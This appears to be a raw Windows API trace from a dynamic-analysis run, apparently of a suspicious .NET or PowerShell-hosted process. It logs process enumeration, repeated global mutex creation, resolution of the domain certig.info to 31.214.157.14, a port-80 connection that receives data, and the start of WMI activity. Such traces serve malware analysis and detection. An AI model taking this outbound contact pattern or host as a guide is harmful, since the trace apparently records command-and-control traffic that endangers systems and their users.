	[0236.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x864) returned 0x404
	[0236.381] GetLastError () returned 0x5
	[0236.381] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x5fae730, lpExitTime=0x5fae728, lpKernelTime=0x5fae728, lpUserTime=0x5fae728 | out: lpCreationTime=0x5fae730, lpExitTime=0x5fae728, lpKernelTime=0x5fae728, lpUserTime=0x5fae728) returned 1
	[0236.381] GetLastError () returned 0x5
	[0236.382] CloseHandle (hObject=0x404) returned 1
	[0236.382] GetLastError () returned 0x5
	[0236.382] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x864) returned 0x404
	[0236.382] GetLastError () returned 0x5
	[0236.382] GetCurrentProcess () returned 0xffffffff
	[0236.382] GetLastError () returned 0x5
	[0236.382] GetCurrentProcess () returned 0xffffffff
	[0236.382] GetLastError () returned 0x5
	[0236.382] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5fae690, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5fae690*=0x408) returned 1
	[0236.382] GetLastError () returned 0x5
	[0236.382] CloseHandle (hObject=0x408) returned 1
	[0236.382] GetLastError () returned 0x5
	[0236.383] CloseHandle (hObject=0x404) returned 1
	[0236.383] GetLastError () returned 0x5
	[0236.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb30) returned 0x404
	[0236.383] GetLastError () returned 0x5
	[0236.383] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x5fae730, lpExitTime=0x5fae728, lpKernelTime=0x5fae728, lpUserTime=0x5fae728 | out: lpCreationTime=0x5fae730, lpExitTime=0x5fae728, lpKernelTime=0x5fae728, lpUserTime=0x5fae728) returned 1
	[0236.383] GetLastError () returned 0x5
	[0236.383] CloseHandle (hObject=0x404) returned 1
	[0236.383] GetLastError () returned 0x5
	[0236.383] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xb30) returned 0x404
	[0236.383] GetLastError () returned 0x5
	[0236.383] GetCurrentProcess () returned 0xffffffff
	[0236.383] GetLastError () returned 0x5
	[0236.383] GetCurrentProcess () returned 0xffffffff
	[0236.383] GetLastError () returned 0x5
	[0236.383] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5fae690, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5fae690*=0x408) returned 1
	[0236.383] GetLastError () returned 0x5
	[0236.384] CloseHandle (hObject=0x408) returned 1
	[0236.384] GetLastError () returned 0x5
	[0236.384] CloseHandle (hObject=0x404) returned 1
	[0236.384] GetLastError () returned 0x5
	[0236.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x888) returned 0x404
	[0236.384] GetLastError () returned 0x5
	[0236.384] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x5fae730, lpExitTime=0x5fae728, lpKernelTime=0x5fae728, lpUserTime=0x5fae728 | out: lpCreationTime=0x5fae730, lpExitTime=0x5fae728, lpKernelTime=0x5fae728, lpUserTime=0x5fae728) returned 1
	[0236.384] GetLastError () returned 0x5
	[0236.384] CloseHandle (hObject=0x404) returned 1
	[0236.384] GetLastError () returned 0x5
	[0236.384] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x888) returned 0x404
	[0236.384] GetLastError () returned 0x5
	[0236.384] GetCurrentProcess () returned 0xffffffff
	[0236.384] GetLastError () returned 0x5
	[0236.384] GetCurrentProcess () returned 0xffffffff
	[0236.384] GetLastError () returned 0x5
	[0236.384] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5fae690, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5fae690*=0x408) returned 1
	[0236.385] GetLastError () returned 0x5
	[0236.385] CloseHandle (hObject=0x408) returned 1
	[0236.385] GetLastError () returned 0x5
	[0236.385] CloseHandle (hObject=0x404) returned 1
	[0236.385] GetLastError () returned 0x5
	[0236.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x708) returned 0x404
	[0236.385] GetLastError () returned 0x5
	[0236.385] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x5fae730, lpExitTime=0x5fae728, lpKernelTime=0x5fae728, lpUserTime=0x5fae728 | out: lpCreationTime=0x5fae730, lpExitTime=0x5fae728, lpKernelTime=0x5fae728, lpUserTime=0x5fae728) returned 1
	[0236.385] GetLastError () returned 0x5
	[0236.385] CloseHandle (hObject=0x404) returned 1
	[0236.385] GetLastError () returned 0x5
	[0236.385] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x708) returned 0x404
	[0236.385] GetLastError () returned 0x5
	[0236.385] GetCurrentProcess () returned 0xffffffff
	[0236.386] GetLastError () returned 0x5
	[0236.386] GetCurrentProcess () returned 0xffffffff
	[0236.386] GetLastError () returned 0x5
	[0236.386] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5fae690, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5fae690*=0x408) returned 1
	[0236.386] GetLastError () returned 0x5
	[0236.386] CloseHandle (hObject=0x408) returned 1
	[0236.386] GetLastError () returned 0x5
	[0236.386] CloseHandle (hObject=0x404) returned 1
	[0236.386] GetLastError () returned 0x5
	[0236.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x120) returned 0x404
	[0236.386] GetLastError () returned 0x5
	[0236.386] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x5fae730, lpExitTime=0x5fae728, lpKernelTime=0x5fae728, lpUserTime=0x5fae728 | out: lpCreationTime=0x5fae730, lpExitTime=0x5fae728, lpKernelTime=0x5fae728, lpUserTime=0x5fae728) returned 1
	[0236.386] GetLastError () returned 0x5
	[0236.386] CloseHandle (hObject=0x404) returned 1
	[0236.387] GetLastError () returned 0x5
	[0236.387] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x120) returned 0x404
	[0236.387] GetLastError () returned 0x5
	[0236.387] GetCurrentProcess () returned 0xffffffff
	[0236.387] GetLastError () returned 0x5
	[0236.387] GetCurrentProcess () returned 0xffffffff
	[0236.387] GetLastError () returned 0x5
	[0236.387] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5fae690, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5fae690*=0x408) returned 1
	[0236.387] GetLastError () returned 0x5
	[0236.387] CloseHandle (hObject=0x408) returned 1
	[0236.387] GetLastError () returned 0x5
	[0236.387] CloseHandle (hObject=0x404) returned 1
	[0236.387] GetLastError () returned 0x5
	[0236.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xaa0) returned 0x404
	[0236.387] GetLastError () returned 0x5
	[0236.388] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x5fae730, lpExitTime=0x5fae728, lpKernelTime=0x5fae728, lpUserTime=0x5fae728 | out: lpCreationTime=0x5fae730, lpExitTime=0x5fae728, lpKernelTime=0x5fae728, lpUserTime=0x5fae728) returned 1
	[0236.388] GetLastError () returned 0x5
	[0236.388] CloseHandle (hObject=0x404) returned 1
	[0236.388] GetLastError () returned 0x5
	[0236.388] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xaa0) returned 0x404
	[0236.388] GetLastError () returned 0x5
	[0236.388] GetCurrentProcess () returned 0xffffffff
	[0236.388] GetLastError () returned 0x5
	[0236.388] GetCurrentProcess () returned 0xffffffff
	[0236.388] GetLastError () returned 0x5
	[0236.388] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5fae690, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5fae690*=0x408) returned 1
	[0236.388] GetLastError () returned 0x5
	[0236.388] CloseHandle (hObject=0x408) returned 1
	[0236.388] GetLastError () returned 0x5
	[0236.388] CloseHandle (hObject=0x404) returned 1
	[0236.388] GetLastError () returned 0x5
	[0236.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x808) returned 0x404
	[0236.389] GetLastError () returned 0x5
	[0236.389] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x5fae730, lpExitTime=0x5fae728, lpKernelTime=0x5fae728, lpUserTime=0x5fae728 | out: lpCreationTime=0x5fae730, lpExitTime=0x5fae728, lpKernelTime=0x5fae728, lpUserTime=0x5fae728) returned 1
	[0236.389] GetLastError () returned 0x5
	[0236.389] CloseHandle (hObject=0x404) returned 1
	[0236.389] GetLastError () returned 0x5
	[0236.389] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x808) returned 0x404
	[0236.389] GetLastError () returned 0x5
	[0236.389] GetCurrentProcess () returned 0xffffffff
	[0236.389] GetLastError () returned 0x5
	[0236.389] GetCurrentProcess () returned 0xffffffff
	[0236.389] GetLastError () returned 0x5
	[0236.389] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5fae690, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5fae690*=0x408) returned 1
	[0236.389] GetLastError () returned 0x5
	[0236.389] CloseHandle (hObject=0x408) returned 1
	[0236.389] GetLastError () returned 0x5
	[0236.390] CloseHandle (hObject=0x404) returned 1
	[0236.390] GetLastError () returned 0x5
	[0236.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c4) returned 0x404
	[0236.390] GetLastError () returned 0x5
	[0236.390] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x5fae730, lpExitTime=0x5fae728, lpKernelTime=0x5fae728, lpUserTime=0x5fae728 | out: lpCreationTime=0x5fae730, lpExitTime=0x5fae728, lpKernelTime=0x5fae728, lpUserTime=0x5fae728) returned 1
	[0236.390] GetLastError () returned 0x5
	[0236.390] CloseHandle (hObject=0x404) returned 1
	[0236.390] GetLastError () returned 0x5
	[0236.390] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x8c4) returned 0x404
	[0236.390] GetLastError () returned 0x5
	[0236.390] GetCurrentProcess () returned 0xffffffff
	[0236.390] GetLastError () returned 0x5
	[0236.390] GetCurrentProcess () returned 0xffffffff
	[0236.390] GetLastError () returned 0x5
	[0236.390] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5fae690, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5fae690*=0x408) returned 1
	[0236.390] GetLastError () returned 0x5
	[0236.391] CloseHandle (hObject=0x408) returned 1
	[0236.391] GetLastError () returned 0x5
	[0236.391] CloseHandle (hObject=0x404) returned 1
	[0236.391] GetLastError () returned 0x5
	[0236.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x404
	[0236.391] GetLastError () returned 0x5
	[0236.391] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x5fae730, lpExitTime=0x5fae728, lpKernelTime=0x5fae728, lpUserTime=0x5fae728 | out: lpCreationTime=0x5fae730, lpExitTime=0x5fae728, lpKernelTime=0x5fae728, lpUserTime=0x5fae728) returned 1
	[0236.391] GetLastError () returned 0x5
	[0236.391] CloseHandle (hObject=0x404) returned 1
	[0236.391] GetLastError () returned 0x5
	[0236.391] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x7cc) returned 0x404
	[0236.391] GetLastError () returned 0x5
	[0236.391] GetCurrentProcess () returned 0xffffffff
	[0236.391] GetLastError () returned 0x5
	[0236.391] GetCurrentProcess () returned 0xffffffff
	[0236.391] GetLastError () returned 0x5
	[0236.391] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5fae690, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5fae690*=0x408) returned 1
	[0236.391] GetLastError () returned 0x5
	[0236.392] CloseHandle (hObject=0x408) returned 1
	[0236.392] GetLastError () returned 0x5
	[0236.392] CloseHandle (hObject=0x404) returned 1
	[0236.392] GetLastError () returned 0x5
	[0236.392] ReleaseMutex (hMutex=0x3f0) returned 1
	[0236.419] GetLastError () returned 0x5
	[0236.419] CloseHandle (hObject=0x3f0) returned 1
	[0236.419] GetLastError () returned 0x5
	[0236.419] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b3aa48, cbSid=0x5fae778 | out: pSid=0x2b3aa48*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5fae778) returned 1
	[0236.419] GetLastError () returned 0x5
	[0236.420] CreateMutexW (lpMutexAttributes=0x2b3ab58, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3f0
	[0236.420] GetLastError () returned 0x0
	[0236.420] WaitForSingleObject (hHandle=0x3f0, dwMilliseconds=0x1f4) returned 0x0
	[0236.420] GetLastError () returned 0x0
	[0236.420] ReleaseMutex (hMutex=0x3f0) returned 1
	[0236.420] GetLastError () returned 0x0
	[0236.420] CloseHandle (hObject=0x3f0) returned 1
	[0236.420] GetLastError () returned 0x0
	[0236.421] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b3b2d0, cbSid=0x5fae778 | out: pSid=0x2b3b2d0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5fae778) returned 1
	[0236.421] GetLastError () returned 0x0
	[0236.421] CreateMutexW (lpMutexAttributes=0x2b3b3e0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3f0
	[0236.421] GetLastError () returned 0x0
	[0236.421] WaitForSingleObject (hHandle=0x3f0, dwMilliseconds=0x1f4) returned 0x0
	[0236.421] GetLastError () returned 0x0
	[0236.422] ReleaseMutex (hMutex=0x3f0) returned 1
	[0236.422] GetLastError () returned 0x0
	[0236.422] CloseHandle (hObject=0x3f0) returned 1
	[0236.422] GetLastError () returned 0x0
	[0236.422] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b3bb68, cbSid=0x5fae778 | out: pSid=0x2b3bb68*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5fae778) returned 1
	[0236.422] GetLastError () returned 0x0
	[0236.423] CreateMutexW (lpMutexAttributes=0x2b3bc78, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3f0
	[0236.423] GetLastError () returned 0x0
	[0236.423] WaitForSingleObject (hHandle=0x3f0, dwMilliseconds=0x1f4) returned 0x0
	[0236.423] GetLastError () returned 0x0
	[0236.423] ReleaseMutex (hMutex=0x3f0) returned 1
	[0236.423] GetLastError () returned 0x0
	[0236.423] CloseHandle (hObject=0x3f0) returned 1
	[0236.423] GetLastError () returned 0x0
	[0236.424] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b3c3f8, cbSid=0x5fae778 | out: pSid=0x2b3c3f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5fae778) returned 1
	[0236.424] GetLastError () returned 0x0
	[0236.424] CreateMutexW (lpMutexAttributes=0x2b3c508, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3f0
	[0236.424] GetLastError () returned 0x0
	[0236.424] WaitForSingleObject (hHandle=0x3f0, dwMilliseconds=0x1f4) returned 0x0
	[0236.424] GetLastError () returned 0x0
	[0236.425] ReleaseMutex (hMutex=0x3f0) returned 1
	[0236.425] GetLastError () returned 0x0
	[0236.425] CloseHandle (hObject=0x3f0) returned 1
	[0236.425] GetLastError () returned 0x0
	[0236.425] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b3cc84, cbSid=0x5fae770 | out: pSid=0x2b3cc84*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5fae770) returned 1
	[0236.425] GetLastError () returned 0x0
	[0236.426] CreateMutexW (lpMutexAttributes=0x2b3cd94, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3f0
	[0236.427] GetLastError () returned 0x0
	[0236.427] WaitForSingleObject (hHandle=0x3f0, dwMilliseconds=0x1f4) returned 0x0
	[0236.427] GetLastError () returned 0x0
	[0236.427] ReleaseMutex (hMutex=0x3f0) returned 1
	[0236.427] GetLastError () returned 0x0
	[0236.427] CloseHandle (hObject=0x3f0) returned 1
	[0236.427] GetLastError () returned 0x0
	[0236.427] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b3d500, cbSid=0x5fae770 | out: pSid=0x2b3d500*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5fae770) returned 1
	[0236.427] GetLastError () returned 0x0
	[0236.428] CreateMutexW (lpMutexAttributes=0x2b3d610, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3f0
	[0236.428] GetLastError () returned 0x0
	[0236.428] WaitForSingleObject (hHandle=0x3f0, dwMilliseconds=0x1f4) returned 0x0
	[0236.428] GetLastError () returned 0x0
	[0236.428] ReleaseMutex (hMutex=0x3f0) returned 1
	[0236.428] GetLastError () returned 0x0
	[0236.428] CloseHandle (hObject=0x3f0) returned 1
	[0236.429] GetLastError () returned 0x0
	[0236.429] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b3dd74, cbSid=0x5fae770 | out: pSid=0x2b3dd74*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5fae770) returned 1
	[0236.429] GetLastError () returned 0x0
	[0236.429] CreateMutexW (lpMutexAttributes=0x2b3de84, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3f0
	[0236.429] GetLastError () returned 0x0
	[0236.429] WaitForSingleObject (hHandle=0x3f0, dwMilliseconds=0x1f4) returned 0x0
	[0236.429] GetLastError () returned 0x0
	[0236.429] ReleaseMutex (hMutex=0x3f0) returned 1
	[0236.430] GetLastError () returned 0x0
	[0236.430] CloseHandle (hObject=0x3f0) returned 1
	[0236.430] GetLastError () returned 0x0
	[0236.430] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b3e5f8, cbSid=0x5fae770 | out: pSid=0x2b3e5f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5fae770) returned 1
	[0236.430] GetLastError () returned 0x0
	[0236.430] CreateMutexW (lpMutexAttributes=0x2b3e708, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3f0
	[0236.430] GetLastError () returned 0x0
	[0236.430] WaitForSingleObject (hHandle=0x3f0, dwMilliseconds=0x1f4) returned 0x0
	[0236.430] GetLastError () returned 0x0
	[0236.431] ReleaseMutex (hMutex=0x3f0) returned 1
	[0236.431] GetLastError () returned 0x0
	[0236.431] CloseHandle (hObject=0x3f0) returned 1
	[0236.431] GetLastError () returned 0x0
	[0236.431] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b3ee74, cbSid=0x5fae770 | out: pSid=0x2b3ee74*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5fae770) returned 1
	[0236.431] GetLastError () returned 0x0
	[0236.431] CreateMutexW (lpMutexAttributes=0x2b3ef84, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3f0
	[0236.432] GetLastError () returned 0x0
	[0236.432] WaitForSingleObject (hHandle=0x3f0, dwMilliseconds=0x1f4) returned 0x0
	[0236.432] GetLastError () returned 0x0
	[0236.432] ReleaseMutex (hMutex=0x3f0) returned 1
	[0236.432] GetLastError () returned 0x0
	[0236.432] CloseHandle (hObject=0x3f0) returned 1
	[0236.432] GetLastError () returned 0x0
	[0236.437] getaddrinfo (in: pNodeName="certig.info", pServiceName=0x0, pHints=0x5fae970*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x5fae704 | out: ppResult=0x5fae704*=0x5639b8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="certig.info", ai_addr=0x56c3b8*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) returned 0
	[0236.736] GetLastError () returned 0x0
	[0236.738] FreeAddrInfoW (pAddrInfo=0x5639b8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="散瑲杩椮普o࠰՞ఛ㦉", ai_addr=0x56c3b8*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) 
	[0236.738] GetLastError () returned 0x0
	[0236.738] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x424
	[0236.738] GetLastError () returned 0x0
	[0236.739] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x42c
	[0236.740] GetLastError () returned 0x0
	[0236.742] WSAConnect (in: s=0x424, name=0x2b3f4cc*(sa_family=2, sin_port=0x50, sin_addr="31.214.157.14"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0236.768] GetLastError () returned 0x0
	[0236.770] closesocket (s=0x42c) returned 0
	[0236.770] GetLastError () returned 0x0
	[0238.719] recv (in: s=0x424, buf=0x2dfdb34, len=502, flags=0 | out: buf=0x2dfdb34*) returned 205
	[0238.719] GetLastError () returned 0x0
	[0240.440] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4f1518, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0240.440] GetLastError () returned 0xcb
	[0240.465] VirtualQuery (in: lpAddress=0x5fade58, lpBuffer=0x5faee58, dwLength=0x1c | out: lpBuffer=0x5faee58*(BaseAddress=0x5fad000, AllocationBase=0x5620000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0240.515] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4f1518, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0240.515] GetLastError () returned 0xcb
	[0240.552] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4f1518, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0240.552] GetLastError () returned 0xcb
	[0240.783] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3e8
	[0240.783] GetLastError () returned 0x0
	[0240.786] CoGetObjectContext (in: riid=0x2e7ab54*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae9cc | out: ppv=0x5fae9cc*=0x4a8dec) returned 0x0
	[0241.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x5fadb84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", lpFilePart=0x0) returned 0x2e
	[0241.075] GetLastError () returned 0x0
	[0241.079] LoadLibraryA (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\\\wminet_utils.dll") returned 0x6a310000
	[0241.294] GetProcAddress (hModule=0x6a310000, lpProcName="ResetSecurity") returned 0x6a311944
	[0241.297] GetProcAddress (hModule=0x6a310000, lpProcName="SetSecurity") returned 0x6a311986
	[0241.300] GetProcAddress (hModule=0x6a310000, lpProcName="BlessIWbemServices") returned 0x6a3119cc
	[0241.304] GetProcAddress (hModule=0x6a310000, lpProcName="BlessIWbemServicesObject") returned 0x6a311a1e
	[0241.308] GetProcAddress (hModule=0x6a310000, lpProcName="GetPropertyHandle") returned 0x6a311a70
	[0241.311] GetProcAddress (hModule=0x6a310000, lpProcName="WritePropertyValue") returned 0x6a311a89
	[0241.314] GetProcAddress (hModule=0x6a310000, lpProcName="Clone") returned 0x6a311aa2
	[0241.317] GetProcAddress (hModule=0x6a310000, lpProcName="VerifyClientKey") returned 0x6a312270
	[0241.320] GetProcAddress (hModule=0x6a310000, lpProcName="GetQualifierSet") returned 0x6a311d73
	[0241.322] GetProcAddress (hModule=0x6a310000, lpProcName="Get") returned 0x6a311b96
	[0241.325] GetProcAddress (hModule=0x6a310000, lpProcName="Put") returned 0x6a311b7a
	[0241.327] GetProcAddress (hModule=0x6a310000, lpProcName="Delete") returned 0x6a311bb5
	[0241.402] IComThreadingInfo:GetCurrentApartmentType (in: This=0x4a8dec, pAptType=0x5fae9c4 | out: pAptType=0x5fae9c4*=1) returned 0x0
	[0241.407] IUnknown:QueryInterface (in: This=0x4a8dec, riid=0x2e7ab3c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5fae9c8 | out: ppvObject=0x5fae9c8*=0x0) returned 0x80004002
	[0241.407] IUnknown:Release (This=0x4a8dec) returned 0x0
	[0241.528] IIDFromString (in: lpsz="{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}", lpiid=0x5fae57c | out: lpiid=0x5fae57c) returned 0x0
	[0241.528] CoGetClassObject (in: rclsid=0x563d04*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae4e4 | out: ppv=0x5fae4e4*=0x6080810) returned 0x0
	[0242.086] WbemDefPath:IUnknown:QueryInterface (in: This=0x6080810, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fae314 | out: ppvObject=0x5fae314*=0x0) returned 0x80004002
	[0242.086] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6080810, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae34c | out: ppvObject=0x5fae34c*=0x6080820) returned 0x0
	[0242.086] WbemDefPath:IUnknown:QueryInterface (in: This=0x6080820, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae0f0 | out: ppvObject=0x5fae0f0*=0x6080820) returned 0x0
	[0242.087] WbemDefPath:IUnknown:QueryInterface (in: This=0x6080820, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fae0ac | out: ppvObject=0x5fae0ac*=0x0) returned 0x80004002
	[0242.087] WbemDefPath:IUnknown:AddRef (This=0x6080820) returned 0x3
	[0242.087] CoGetContextToken (in: pToken=0x5fadf38 | out: pToken=0x5fadf38) returned 0x0
